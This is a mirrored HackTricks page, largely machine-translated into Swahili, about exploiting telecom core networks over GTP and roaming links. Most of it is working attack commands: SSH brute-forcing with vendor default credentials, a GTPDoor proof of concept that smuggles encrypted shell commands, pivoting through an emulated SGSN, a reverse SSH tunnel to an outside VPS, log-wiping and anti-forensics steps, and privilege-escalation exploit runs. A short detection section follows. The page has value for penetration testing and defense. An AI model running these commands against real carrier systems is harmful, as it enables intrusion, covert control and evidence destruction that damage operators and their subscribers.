maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md

141 lines
6.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Telecom Network Exploitation (GTP / Roaming Environments)
{{#include ../../banners/hacktricks-training.md}}
> [!NOTE]
> Protokali za msingi za simu (GPRS Tunnelling Protocol GTP) mara nyingi hupita kwenye mifumo ya GRX/IPX ya kuhamahama ambayo inaaminika kwa kiasi fulani. Kwa sababu zinatumia UDP bila uthibitisho wowote, **mara nyingi mguu wowote ndani ya mipaka ya telecom unaweza kufikia moja kwa moja ndege za ishara za msingi**. Maelezo yafuatayo yanakusanya mbinu za mashambulizi zilizoshuhudiwa katika mazingira halisi dhidi ya SGSN/GGSN, PGW/SGW na nodi nyingine za EPC.
## 1. Recon & Initial Access
### 1.1 Default OSS / NE Accounts
Seti kubwa ya ajabu ya vipengele vya mtandao wa wauzaji huja na watumiaji wa SSH/Telnet waliowekwa kwa nguvu kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Orodha ya maneno iliyotengwa huongeza kwa kiasi kikubwa mafanikio ya brute-force:
```bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
```
Ikiwa kifaa kinatoa tu VRF ya usimamizi, pitisha kupitia mwenyeji wa jump kwanza (tazama sehemu «SGSN Emu Tunnel» hapa chini).
### 1.2 Ugunduzi wa Mwenyeji ndani ya GRX/IPX
Watoa huduma wengi wa GRX bado wanaruhusu **ICMP echo** kupitia msingi. Changanya `masscan` na uchunguzi wa `gtpv1` UDP uliojengwa ndani ili haraka kuchora wasikilizaji wa GTP-C:
```bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
```
## 2. Kuorodhesha Wajibu `cordscan`
Zana hii ya Go inatengeneza **GTP-C Create PDP Context Request** pakiti na kurekodi majibu. Kila jibu linafunua **SGSN / MME** inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na mteja.
```bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
```
Key flags:
- `--imsi` Lengo la mteja IMSI
- `--oper` Nyumbani / HNI (MCC+MNC)
- `-w` Andika pakiti za raw kwenye pcap
Misingi muhimu ndani ya binary inaweza kubadilishwa ili kupanua skana:
```
pingtimeout = 3 // seconds before giving up
pco = 0x218080
common_tcp_ports = "22,23,80,443,8080"
```
## 3. Utekelezaji wa Kanuni kupitia GTP `GTPDoor`
`GTPDoor` ni huduma ndogo ya ELF ambayo **inafungua UDP 2123 na kuchambua kila pakiti ya GTP-C inayokuja**. Wakati mzigo unapoanza na lebo iliyoshirikiwa awali, yaliyobaki yanachambuliwa (AES-128-CBC) na kutekelezwa kupitia `/bin/sh -c`. Stdout/stderr zinahamishwa ndani ya **Echo Response** ujumbe ili kwamba hakuna kikao chochote cha nje kinachoundwa.
Pakiti ya PoC ya chini (Python):
```python
import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
```
Detection:
* mwenyeji yeyote anayepeleka **Maombi ya Echo yasiyo sawa** kwa IP za SGSN
* Bendera ya toleo la GTP imewekwa kuwa 1 wakati aina ya ujumbe = 1 (Echo) mabadiliko kutoka kwa spesifiki
## 4. Pivoting Through the Core
### 4.1 `sgsnemu` + SOCKS5
`OsmoGGSN` inatoa emulators ya SGSN inayoweza **kuanzisha muktadha wa PDP kuelekea GGSN/PGW halisi**. Mara baada ya kujadiliwa, Linux inapokea kiunganishi kipya cha `tun0` kinachoweza kufikiwa kutoka kwa mwenzi wa roaming.
```bash
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 & # internal SOCKS proxy
```
Kwa matumizi sahihi ya firewall hair-pinning, handaki hii inapita VLANs za ishara pekee na inakufikisha moja kwa moja kwenye **data plane**.
### 4.2 SSH Reverse Tunnel juu ya Port 53
DNS karibu kila wakati iko wazi katika miundombinu ya kuhamahama. Funua huduma ya ndani ya SSH kwa VPS yako inayosikiliza kwenye :53 na urudi baadaye kutoka nyumbani:
```bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
```
Check that `GatewayPorts yes` is enabled on the VPS.
## 5. Covert Channels
| Channel | Transport | Decoding | Notes |
|---------|-----------|----------|-------|
| ICMP `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikivu safi, hakuna trafiki ya nje |
| DNS `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | inatazama `*.nodep` sub-domain |
| GTP `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | inachanganyika na mazungumzo halali ya GTP-C |
All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.
## 6. Defense Evasion Cheatsheet
```bash
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
# Disable bash history
export HISTFILE=/dev/null
# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup # hide from top/htop
printf '\0' > /proc/$$/comm # appears as [kworker/1]
touch -r /usr/bin/time /usr/bin/chargen # timestomp
setenforce 0 # disable SELinux
```
## 7. Kuinua Haki kwenye NE za Kizamani
```bash
# DirtyCow CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
# PwnKit CVE-2021-4034
python3 PwnKit.py
# Sudo Baron Samedit CVE-2021-3156
python3 exploit_userspec.py
```
Usafi wa mazingira:
```bash
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c
```
## 8. Tool Box
* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` zana za kawaida zilizoelezwa katika sehemu za awali.
* `FScan` : skanning ya TCP ya intranet (`fscan -p 22,80,443 10.0.0.0/24`)
* `Responder` : LLMNR/NBT-NS rogue WPAD
* `Microsocks` + `ProxyChains` : pivoting nyepesi wa SOCKS5
* `FRP` (≥0.37) : NAT traversal / bridging ya mali
---
## Detection Ideas
1. **Kila kifaa kingine isipokuwa SGSN/GGSN kinachounda Maombi ya Kuunda Muktadha wa PDP**.
2. **Bandari zisizo za kawaida (53, 80, 443) zinapokea mikono ya SSH** kutoka kwa IP za ndani.
3. **Maombi ya Echo mara kwa mara bila Majibu ya Echo yanayolingana** yanaweza kuashiria beacon za GTPDoor.
4. **Kiwango cha juu cha trafiki ya ICMP echo-reply yenye viwanja vikubwa, visivyo na sifuri vya kitambulisho/mfuatano**.
## References
- [Palo Alto Unit42 Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
- 3GPP TS 29.060 GPRS Tunnelling Protocol (v16.4.0)
- 3GPP TS 29.281 GTPv2-C (v17.6.0)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink